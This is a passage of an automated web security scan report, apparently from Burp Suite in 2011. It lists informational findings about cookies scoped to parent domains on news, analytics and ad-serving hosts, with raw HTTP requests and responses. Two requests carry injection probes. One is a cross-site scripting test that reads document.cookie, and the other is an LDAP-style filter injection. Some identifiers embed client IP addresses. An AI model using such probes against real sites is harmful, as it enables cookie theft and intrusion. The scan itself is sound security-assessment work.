Cookie: NETID01=TSeEzxMBEwoAABzXtKIAAAAt; NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d55a964&0&&4d2fe81e&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_J08778=0105974ea67d21e1&J08778&0&4d5ae6ff&0&&4d350f93&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_K04491=0105974ea67d21e1&K04491&0&4d62d3e4&0&&4d3cf159&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_H05525=0105974ea67d21e1&H05525&0&4d631d1f&0&&4d3d3a07&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_G07610=0105974ea67d21e1&G07610&0&4d631e10&0&&4d3d330b&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_B08725=0105974ea67d21e1&B08725&0&4d656938&0&&4d3f9d13&4c5cffb70704da9ab1f721e8ae18383d; rsi_segs_1000000=pUPFek+FKAIQ1kNbPCvXupu0dYRBBw10Qnf0xWQrS0BEV6VWEHVfSnhpJVW5Lutkv1AyDl7qxTuCJgKvTPglemXPFwXO/l9yiURcsiUamtWcEzbP2TrfBHkE6to317EuNk9+iXSG4DvY1g/WBQ7a8qgeGg5oDbhmSSc5VoUxIBgQS/K4Q3yRHjMx2E0L81Hpbsggz0uWpYjffiAisiXmERkc/1665y5ZjB1b5STeJ4Pw4InvEOIoEyC78lpwlYmIydTi5ad2s/hOwYyScvdENQ==; rtc_0=MLsvrtMvcS5nJQFEBOfISErx+c1JMM1lDAyWHQIjVfvuhWI24GqMWoF/oWJdVrkRObfmVAFC7D5kNDpA7XLOLyXT7eHooUJSyInu6zq77Ti1xy5n8Qg3XeEe+tnQc/qNK5SeIuNm9OiemNvg0uPlUbqN72Pj+9+Ar1bDVU7hjepOYqJdor+NnFmpdNvQfxTIoHitxigPuoiTVzaqoruXF69raqbuvDx9NSxO37yG1cXJQrgqNEJYL+2aRbtieJoq+tCHUpTw8bYVhr5p0THE5yB09PMYdBM/swb+JMOM7Snl6/uAVD2lwzGGjsLQzOAv+uBqR8jCXnxVhvn7VWB6iHsq1LcapkedsIN3gi/o04igBj2IKrYeTcLWm4dMlDT7lMD1xWUmpmHTEibAOge6OBtRCgwHRB4CstW16Jo3oxnT; rsi_us_1000000=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; udm_0=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

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_us_1000000=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; Domain=.revsci.net; Expires=Thu, 22-Jan-2043 01:29:45 GMT; Path=/
Content-Type: application/x-javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sun, 30 Jan 2011 01:29:44 GMT
Content-Length: 541

function rsi_img(p,u,c){if(u.indexOf(location.protocol)==0){var i=new Image(2,3);if(c){i.onload=c;}
i.src=u;p[p.length]=i;}}
function rsi_simg(p,s,i){if(i<s.length){rsi_img(p,s[i],function(){rsi_sim
...[SNIP]...

16.33. http://alex-johnson.newsvine.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://alex-johnson.newsvine.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: alex-johnson.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:04:23 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=71247d98d365d957459ad2146ae86d57; expires=Sat, 25-Jan-2031 02:04:23 GMT; path=/; domain=.newsvine.com
Content-Length: 0
Content-Type: text/html
Connection: close


16.34. http://amch.questionmarket.com/adsc/d775684/10/38973908/decide.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adsc/d775684/10/38973908/decide.php

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adsc/d775684/10/38973908/decide.php HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LP=1296062048; CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-1_39942282-8-1_39823749-21-1_40142779-4-1; ES=823529-ie.pM-MG_844890-`:tqM-0_822109-|RIsM-26_853829-y]GsM-Bi1_847435-l^GsM-!"1_791689-/qcsM-0_852149-*jtsM-0

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 12:18:57 GMT
Server: Apache/2.2.14 (Ubuntu)
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC"
DL_S: a222
Set-Cookie: linkjumptest=1; path=/; domain=.questionmarket.com
Set-Cookie: CS1=deleted; expires=Sat, 30-Jan-2010 12:18:56 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-1_39942282-8-1_39823749-21-1_40142779-4-1_38973908-10-1; expires=Thu, 22-Mar-2012 04:18:57 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=823529-ie.pM-MG_844890-`:tqM-0_822109-|RIsM-26_853829-y]GsM-Bi1_847435-l^GsM-!"1_791689-/qcsM-0_852149-*jtsM-0_775684-'LysM-0; expires=Thu, 22-Mar-2012 04:18:57 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 1

;

16.35. http://amch.questionmarket.com/adsc/d852149/4/40142779/decide.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adsc/d852149/4/40142779/decide.php

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adsc/d852149/4/40142779/decide.php?ord=1296350847 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N3740.MSN/B5123509.8;sz=300x250;siteid=msn;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003O/53000000000034172.1?!&&PID=8108870&UIT=G&TargetID=20624992&AN=304826910&PG=INVIHR&ASID=526d9cac631c46728d1cd271a57cd5b5&destination=;ord=304826910?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LP=1296062048; CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-1_39942282-8-1_39823749-21-1; ES=823529-ie.pM-MG_844890-`:tqM-0_822109-|RIsM-26_853829-y]GsM-Bi1_847435-l^GsM-!"1_791689-/qcsM-0

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:23:03 GMT
Server: Apache/2.2.14 (Ubuntu)
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC"
DL_S: a204
Set-Cookie: CS1=deleted; expires=Sat, 30-Jan-2010 02:23:02 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-1_39942282-8-1_39823749-21-1_40142779-4-1; expires=Wed, 21-Mar-2012 18:23:03 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=823529-ie.pM-MG_844890-`:tqM-0_822109-|RIsM-26_853829-y]GsM-Bi1_847435-l^GsM-!"1_791689-/qcsM-0_852149-*jtsM-0; expires=Wed, 21-Mar-2012 18:23:03 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;

16.36. http://ar.voicefive.com/b/wc_beacon.pli

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/wc_beacon.pli

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/wc_beacon.pli?n=BMX_G&d=0&v=method-%3E-1,ts-%3E1296351006.909,wait-%3E10000,&1296351005834 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/860849269/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=860849269?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_p85001580=exp=39&initExp=Wed Jan 26 20:14:29 2011&recExp=Sun Jan 30 01:30:06 2011&prad=58087454&arc=40401740&; BMX_G=method->-1,ts->1296351006; BMX_3PC=1; UID=1d29d89e-72.246.30.75-1294456810

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 30 Jan 2011 01:30:07 GMT
Content-Type: image/gif
Connection: close
Vary: Accept-Encoding
Set-Cookie: BMX_G=method%2D%3E%2D1%2Cts%2D%3E1296351006%2E909%2Cwait%2D%3E10000%2C; path=/; domain=.voicefive.com;
Content-length: 42
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent

GIF89a.............!.......,........@..D.;

16.37. http://ar.voicefive.com/bmx3/broker.pli

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bmx3/broker.pli?pid=p85001580&PRAd=58087454&AR_C=40401740 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/860849269/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=860849269?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_p85001580=exp=38&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Jan 29 23:04:15 2011&prad=58087444&arc=40401508&; UID=1d29d89e-72.246.30.75-1294456810

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 30 Jan 2011 01:30:06 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p85001580=exp=39&initExp=Wed Jan 26 20:14:29 2011&recExp=Sun Jan 30 01:30:06 2011&prad=58087454&arc=40401740&; expires=Sat 30-Apr-2011 01:30:06 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1296351006; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 26496

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"58087454",Pid:"p85001580",Arc:"40401740",Location:CO
...[SNIP]...

16.38. http://articles.redacted/news/news.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://articles.redacted
Path:   /news/news.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/news.aspx HTTP/1.1
Host: articles.moneycentral.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:05:33 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA43
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=a9c5053b2f704163858001bde4170892; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=FDEFD5726B4F41F2A069537932EBC97A; domain=.moneycentral.msn.com; expires=Thu, 18-Aug-2011 02:05:33 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 39029

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

16.39. http://athima-chansanchai.newsvine.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://athima-chansanchai.newsvine.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: athima-chansanchai.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:04:32 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=604df4063ca91afa132a73bbd94df4dd; expires=Sat, 25-Jan-2031 02:04:32 GMT; path=/; domain=.newsvine.com
Content-Length: 0
Content-Type: text/html
Connection: close


16.40. http://b.rad.redacted/ADSAdClient31.dll

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.rad.redacted
Path:   /ADSAdClient31.dll

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=0&PN=MSFT&PG=INVIHP&AP=1089 HTTP/1.1
Host: b.rad.redacted
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; FC00=FB=; FC01=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC07=FB=; FC08=FB=; FC09=FB=; FC06=FB=AgEAYQ4OwAwZ; s_cc=true; s_sq=%5B%5BB%5D%5D; FC02=FB=AgEAYQ4UwAwC

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 2407
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: FC00=FB=AgEAYQ6guQgB; expires=Tue, 29-Jan-2013 12:00:00 GMT; domain=.rad.redacted; path=/; HttpOnly
X-RADID: P8128603-T38305882-C117000000000038318
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 13:00:28 GMT
Content-Length: 2407


//<![CDATA[
function getRADIds() { return{"adid":"117000000000038318","pid":"8128603","targetid":"38305882"};} if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 300, 250);if(par
...[SNIP]...

16.41. http://b.scorecardresearch.com/b

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?rn=1296343586482&c7=http%3A%2F%2Fwww.redacted%2F&c1=2&c2=3000001 HTTP/1.1
Accept: */*
Referer: http://www.redacted/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: b.scorecardresearch.com
Proxy-Connection: Keep-Alive
Cookie: UID=5d4473db-24.143.206.162-1293844712

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Sat, 29 Jan 2011 23:26:31 GMT
Connection: close
Set-Cookie: UID=5d4473db-24.143.206.162-1293844712; expires=Mon, 28-Jan-2013 23:26:31 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


16.42. http://b.scorecardresearch.com/r

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /r

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r?c2=3000001&d.c=gif&d.o=msnbcom&d.x=212602874&d.t=page&d.u=http%3A%2F%2Fphotoblog.msnbc.msn.com%2F_news%2F2011%2F01%2Fad5b7d32bfbc5f43%29%28sn%3D*%2F5942494-double-whammy-on-the-sun%3Fgt1%3D43001&d.r=http%3A%2F%2Fburp%2Fshow%2F3 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://photoblog.msnbc.redacted/_news/2011/01/ad5b7d32bfbc5f43)(sn=*/5942494-double-whammy-on-the-sun?gt1=43001
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Sun, 30 Jan 2011 01:19:41 GMT
Connection: close
Set-Cookie: UID=1f00d615-24.143.206.88-1294170954; expires=Tue, 29-Jan-2013 01:19:41 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;

16.43. http://b.voicefive.com/b

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.voicefive.com
Path:   /b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=4&c2=p85001580&c3=58087454&c4=40401740&c5=1&c6=39&c7=wed%20jan%2026%2020%3A14%3A29%202011&c8=http%3A%2F%2Fad.doubleclick.net%2Fadi%2FN3867.270604.B3%2FB5128597.7%3Bsz%3D728x90%3Bclick0%3Dhttp%3A%2F%2Fr1-ads.ace.advertising.com%2Fclick%2Fsite%3D0000730461%2Fmnum%3D0000950192%2Fcstr%3D12110217%3D_4d44bf07%2C6566708061%2C730461_950192_1183_0%2C1_%2Fxsxdata%3D%24XSXDATA%2Fbnum%3D12110217%2Foptn%3D64%3Ftrg%3Dhttp%3A%2F%2Fb3.mookie1.com%2FRealMedia%2Fads%2Fclick_lx.ads%2FAOLB3%2FRadioShack%2FSELL_2011Q1%2FCPA%2F728%2FL36%2F860849269%2Fx90%2FUSNetwork%2FRS_SELL_2011Q1_AOL_CPA_728%2FRadioShack_SELL_2011Q1.html%2F72634857383030695a694d41416f6366%3F%3Bord%3D860849269%3F&c9=Advertisement&c10=http%3A%2F%2Fmsn.whitepages.com%2F&c15=&1296351004927 HTTP/1.1
Host: b.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/860849269/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=860849269?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; UID=1d29d89e-72.246.30.75-1294456810; ar_p85001580=exp=39&initExp=Wed Jan 26 20:14:29 2011&recExp=Sun Jan 30 01:30:06 2011&prad=58087454&arc=40401740&; BMX_G=method->-1,ts->1296351006; BMX_3PC=1

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Sun, 30 Jan 2011 01:30:06 GMT
Connection: close
Set-Cookie: UID=1d29d89e-72.246.30.75-1294456810; expires=Tue, 29-Jan-2013 01:30:06 GMT; path=/; domain=.voicefive.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


16.44. http://boyle.newsvine.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://boyle.newsvine.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: boyle.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:05:03 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=9ff34bdc0b2e32fcc178bd49c46b26f9; expires=Sat, 25-Jan-2031 02:05:03 GMT; path=/; domain=.newsvine.com
Content-Length: 0
Content-Type: text/html
Connection: close


16.45. http://bs.serving-sys.com/BurstingPipe/adServer.bs

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2117809&PluID=0&w=300&h=60&ord=35801428&ifrm=1&ncu=$$http://g.redacted/_2AD0003L/79000000000085282.1?!&&PID=7902678&UIT=G&TargetID=28253485&AN=35801428&PG=INVPC2&ASID=a610568226dd43348f3d9fefa630960e$$ HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u3=1; C4=; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; A3=f+JvabEk02WG00002h5iUabNA07l00000Qh5j3abNz07l00000.gn3Ka4JO09MY00001gNfHaaiN0aVX00001fU+La50V0a+r00001fUFGa50V02WG00001cRreabeg03Dk00001gy7La9bU0c9M00003gy5Da9bU0c9M00001gCTVa9bU0c9M00001; B3=7lgH0000000001sG89PS000000000QsZ89PT000000000.sZ852G0000000003sS7dNH0000000002sZ83xP0000000001sF8cVQ0000000001sV6o.Q0000000001sY7gi30000000001sG852z0000000001sS852A0000000001sS; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
